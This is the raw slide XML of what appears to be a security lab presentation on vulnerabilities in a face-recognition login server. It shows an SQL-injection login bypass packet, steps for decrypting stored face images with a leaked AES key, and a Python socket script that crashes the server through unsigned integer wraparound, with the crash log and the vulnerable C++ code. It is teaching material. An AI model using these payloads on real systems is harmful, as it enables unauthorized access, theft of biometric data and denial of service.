              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>'\x53\x42\x31\x54\x21\x00\x00\x00\xC7\x8C\x07\x3C\xE8\x03\x00\x00\x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0A\x0B\x61\x64\x6D\x69\x6E\x27\x20\x2D\x2D\x20\x27\x12\x02\x30\x30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49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50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604706" y="5242560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admin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86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V07 – SQL injection for login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[REVIEW/CODE]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SQLINJECTION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CRAFTPACKET]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INTEGRITY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] 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3   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SQL query on the server side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“SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>* from user where account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=‘“ + “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admin’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-- ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” + “’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=‘” 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“SELECT * from user where account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=‘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admin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’ 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-- ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>=‘” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>…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/>
              <a:t>“SELECT * from user where account=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>”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Successfully login using SQL injection !!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/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237575" y="2717882"/>
            <a:ext cx="5600700" cy="19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Pollute user DB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gain ‘admin’ privilege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To do that, login ‘admin’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6" name="Picture 6" descr="Free Vector | Colored hacker code realistic composition with person creates  codes for hacking and stealing information vector illustr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8" y="4595664"/>
            <a:ext cx="2241550" cy="18333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014788" y="5242560"/>
            <a:ext cx="53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ID</a:t>
            </a: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PW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604706" y="5242560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admin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0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0"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent6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5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V09 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" kern="100" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Extraction of name and face </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" kern="100" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>image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68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3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 smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”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6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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
              <a:solidFill>
                <a:prstClr val="white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key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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Obtain registered image and name</a:t>
            </a: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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="세로로 말린 두루마리 모양 10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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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71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media.discordapp.net/attachments/844851665566826506/859947503066284042/blob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" y="4399280"/>
            <a:ext cx="199136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media.discordapp.net/attachments/844851665566826506/859947882534797312/unkn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0" y="4399280"/>
            <a:ext cx="1117600" cy="148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V09 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" kern="100" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>– Extraction of name and face image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[SERVER/ACCESS]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[REVIEW/DESIGN]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[REVEALEDKEY]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[CONFIDENTIALITY]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Obtain user picture and name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Obtain AES key from file “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>secret.key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRP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2   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extract encrypted data from “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tartan_face.db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lv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3   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Decrypt the data with the key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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Obtain registered image and name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600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000" y="208370"/>
            <a:ext cx="6400000" cy="360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63938" y="4389120"/>
            <a:ext cx="2018453" cy="151384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rgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="세로로 말린 두루마리 모양 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014780" y="4389120"/>
            <a:ext cx="1547060" cy="1513840"/>
          </a:xfrm>
          <a:prstGeom prst="verticalScroll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1304924" y="948906"/>
            <a:ext cx="10048875" cy="5228058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4000" kern="100" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>V12 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" kern="100" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Crash by unsigned integer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" kern="100" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wraparound</a:t>
            </a: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12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36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3600" kern="100" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>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[WRAPAROUND] [CRAFTPACKET]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36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3600" kern="100" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="36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36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46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1   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Craft packet causing server crash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\x53\x42\x31\x54</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x02\x00\x00\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>\xC7\x8C\x07\x3C\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>xEA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>\x03\x00\x00\xD4\x3D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\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x02\x00\x00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\x00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>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whole packet size</a:t>
            </a:r>
            <a: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  <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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3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0"/>
            <a:ext cx="12209241" cy="68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2   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Send the crafted packet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smtClean="0"/>
              <a:t>s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>socket.socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>socket.AF_INET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socket.SOCK_STREAM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s.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>(('192.168.0.228', 50000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>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 err="1" smtClean="0"/>
              <a:t>s.sendall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(b'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>x53\x42\x31\x54</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x02\x00\x00\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>\xC7\x8C\x07\x3C\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>xEA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>\x03\x00\x00\xD4\x3D')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2796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237575" y="210865"/>
            <a:ext cx="5600700" cy="1953215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ko-KR" sz="2000" kern="100" dirty="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>V12 – Crash by unsigned integer wraparound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" kern="100" dirty="0" smtClean="0">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34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Resource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[SERVERINFO]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Approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="100" dirty="0" smtClean="0"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[FUZZING]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Technique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="100" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	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[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WRAPAROUND] [CRAFTPACKET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="100" dirty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CIA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="100" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="18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[AVAILABILITY]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00" y="210865"/>
            <a:ext cx="6400000" cy="3600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="내용 개체 틀 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237575" y="2717883"/>
            <a:ext cx="5600700" cy="976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kern="100" dirty="0" smtClean="0">
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attack Goal</a:t>
            </a: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800" kern="100" dirty="0" smtClean="0">
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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1800" kern="100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Make the system not working</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" kern="1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06448"/>
            <a:ext cx="2255520" cy="2273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5563000" y="4021730"/>
            <a:ext cx="6400000" cy="2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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Step 3   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>System crash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1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length=2  head=[SB1T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</a:t>
            </a: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msgtype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=1002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pkt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header : timestamp=-</a:t>
            </a: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890563053</a:t>
            </a:r>
            <a:b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altLang="ko-KR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…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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>libprotobuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> FATAL google/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>protobuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>/stubs/stringpiece.cc:50] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size too big</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>: 18446744073709551602 details: string length exceeds max </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>size</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>terminate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>called after throwing an instance of 'google::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>protobuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>FatalException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>():  size too big: 18446744073709551602 details: string length exceeds max </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>size</a:t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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abort!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12745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" y="518160"/>
            <a:ext cx="11216640" cy="596763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/>
              <a:t>// ProtocolManager.cpp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err="1"/>
              <a:t>CBaseProtocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>CProtocolManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>parse_packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>MyPacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>ppkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>) {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CBaseProtocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>cpkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>nullptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>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 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size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>payload_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ppkt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en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hdr.size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>MyPacketHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>)/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> */;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 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length=%d  head=[%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>c%c%c%c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>]\n", 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hdr.size,ppkt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[0],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[1],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[2],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[3]);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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(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[0]=='S' &amp;&amp;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hdr.head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>[1]=='B' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>&amp;&amp;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	     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hdr.head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>[2]=='1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>&amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ppkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>hdr.head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>[3]=='T' ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> {</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>msgtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=%d\n",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hdr.msgtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>pkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> header : timestamp=%d\n", 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hdr.timestamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>); 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>cpkt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>create_protocol_instance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>MsgReq</a:t>
            </a:r>
            <a:r>
